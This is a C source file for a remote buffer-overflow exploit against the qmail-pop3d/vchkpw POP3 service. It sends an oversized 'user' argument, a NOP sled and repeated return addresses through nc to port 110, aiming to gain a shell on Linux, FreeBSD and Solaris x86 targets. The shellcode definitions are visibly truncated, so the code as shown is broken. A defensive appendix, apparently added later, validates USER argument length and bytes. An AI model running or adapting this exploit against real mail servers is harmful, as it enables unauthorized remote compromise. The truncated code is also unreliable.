qmail-qpop3d-vchkpw.c (v.3)
by: K2,

The inter7-supported vchkpw/vpopmail package (replacement for checkpassword)
has big problems ;)

gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
( ./vpop [offset] [alignment] ; cat ) | nc target.com 110

play with the alignment to get it to A) crash B) work.
qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
Tested against: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE

Hi plaguez.
Props to Interrupt for testing with BSD, _eixon and others ;)
cheez shell's :)
THX goes out to STARBUCKS*!($#!

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 260
#define NOP 0x90
#ifdef SX86
#define DEFOFF 0x8047cfc
#define NOPDEF 75
#elif BSD
#define DEFOFF 0xbfbfdbbf
#define NOPDEF 81
#else
#define DEFOFF 0xbffffcd8
#define NOPDEF 81
#endif

char *shell =
#ifdef SX86 // Solaris IA32 shellcode, cheez
#elif BSD // fBSD shellcode, mudge@l0pht.com
#else // Linux shellcode, no idea

int main(int argc, char **argv)
{
    int i=0,esp=0,offset=0,nop=NOPDEF;
    char buffer[SIZE];

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtol(argv[2], NULL, 0);

    esp = DEFOFF;

    memset(buffer, NOP, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));
    for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
        *((int *) &buffer[i]) = esp+offset;
    }

    printf("user %s\n",buffer);
    printf("pass ADMR0X&*!(#&*(!\n");

    fprintf(stderr,"\nbuflen = %d, nops = %d, target = 0x%x\n\n",strlen(buffer),nop,esp+offset);
}
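
The exploit above delivers its oversized buffer as the argument of the POP3 `user` command. The following is an added defensive example, not part of the original file and not vpopmail code: a bounds check a server or filtering proxy could apply to that argument before any copy. The function names are hypothetical, and the 40-character limit and printable-ASCII rule are taken from RFC 1939.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define POP3_ARG_MAX 40 /* RFC 1939: each argument may be up to 40 characters */

enum user_check { USER_OK, USER_NOT_USER_CMD, USER_EMPTY, USER_TOO_LONG, USER_BAD_BYTE };

/* Hypothetical helper (not from vpopmail): validate one POP3 command line of
 * `len` bytes and copy an acceptable USER argument into out[out_sz]. */
enum user_check check_user_line(const char *line, size_t len, char *out, size_t out_sz)
{
    size_t i;

    if (len < 5 || strncasecmp(line, "user ", 5) != 0)
        return USER_NOT_USER_CMD;
    line += 5;
    len -= 5;
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                                  /* drop the line terminator */
    if (len == 0)
        return USER_EMPTY;
    if (len > POP3_ARG_MAX || len >= out_sz)    /* reject, never truncate or overflow */
        return USER_TOO_LONG;
    for (i = 0; i < len; i++)                   /* printable ASCII only, so no 0x90 runs */
        if ((unsigned char)line[i] < 0x21 || (unsigned char)line[i] > 0x7e)
            return USER_BAD_BYTE;
    memcpy(out, line, len);
    out[len] = '\0';
    return USER_OK;
}

/* Constructed input: "user " followed by 260 bytes of 0x90, the size and fill
 * byte the exploit above uses (no payload, no addresses). */
enum user_check check_constructed_oversized(void)
{
    char line[5 + 260 + 2], out[POP3_ARG_MAX + 1];

    memcpy(line, "user ", 5);
    memset(line + 5, 0x90, 260);
    memcpy(line + 5 + 260, "\r\n", 2);
    return check_user_line(line, sizeof line, out, sizeof out);
}

int main(void)
{
    char out[POP3_ARG_MAX + 1];
    const char ok[] = "user alice@example.com\r\n";   /* constructed sample */

    printf("normal=%d oversized=%d\n",
           check_user_line(ok, strlen(ok), out, sizeof out), check_constructed_oversized());
    return 0;
}
```

Rejected lines are worth logging with the client address, since a `user` argument that is both over-long and non-printable does not occur in normal mail client traffic.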